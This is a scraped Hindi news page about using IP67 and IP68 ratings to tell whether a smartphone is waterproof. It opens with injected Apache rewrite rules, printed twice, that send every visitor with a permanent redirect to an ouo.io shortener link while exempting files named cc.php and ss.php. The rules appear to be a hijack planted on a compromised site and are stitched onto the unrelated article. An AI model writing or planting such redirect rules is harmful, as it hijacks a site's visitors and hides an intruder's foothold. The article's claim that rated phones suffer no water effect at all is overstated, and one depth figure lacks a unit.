
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 564
Nextहम में से ज्यादातर लोग स्मार्टफोन खरीद तो लेते हैं, लेकिन उसके फीचर्स और स्पेसिफिकेशन के बारे में ज्यादा जानकारी नहीं होती है। होली के रंग में भंग अक्सर उस वक्त पड़ जाता है। जब आपका हजारों का स्मार्टफोन रंग खेलते वक्त उसमें थोड़ा भी पानी चला जाए। ऐसे में होली से पहले आप बाजार में मौजूद अलग-अलग तरह के प्रोटेक्टिव पाउच और कवर का इस्तेमाल कर अपने कीमती स्मार्टफोन को पानी से बचा सकते हैं। लेकिन क्या आपको पता है, जिस स्मार्टफोन को आप पानी से बचा रहे है, हो सकता है वह पहले से वाटरप्रूफ हो। लेकिन कैसे पता चलेगा कि आपका स्मार्टफोन वाटरप्रूफ है या नही. आइये हम आपको बताते हैं...
पानी के अन्दर कोई स्मार्टफोन कितना पॉवरफुल है। इसका अंदाज़ा उसको मिलने वाली IP रेटिंग से लगाया जा सकता है। IP 67 और IP68 वाले सभी स्मार्टफोन वाटरप्रूफ होते है। जिनपर पानी का किसी भी तरह से कोई प्रभाव नहीं पड़ता है।
अगर आपका मोबाइल IP67 रेटिंग से लैस तो वह स्मार्टफोन पानी के अन्दर एक मीटर गहराई तक 30 मिनट तक आराम से रह सकता है।
इसी तरह से अगर आपका स्मार्टफोन IP68 रेटिंग से लैस है तो वह स्मार्टफोन पानी के अन्दर करीब 1.5 गहराई तक 30 मिनट तक आराम से रह सकता है। तो अगली बार जब आप स्मार्टफोन खरीदने जाए तो इन रेटिंगस पर जरूर गौर करें क्योंकि इनके साथ आपका स्मार्टफोन पानी में भीगने के बाद भी आराम से काम करेगा।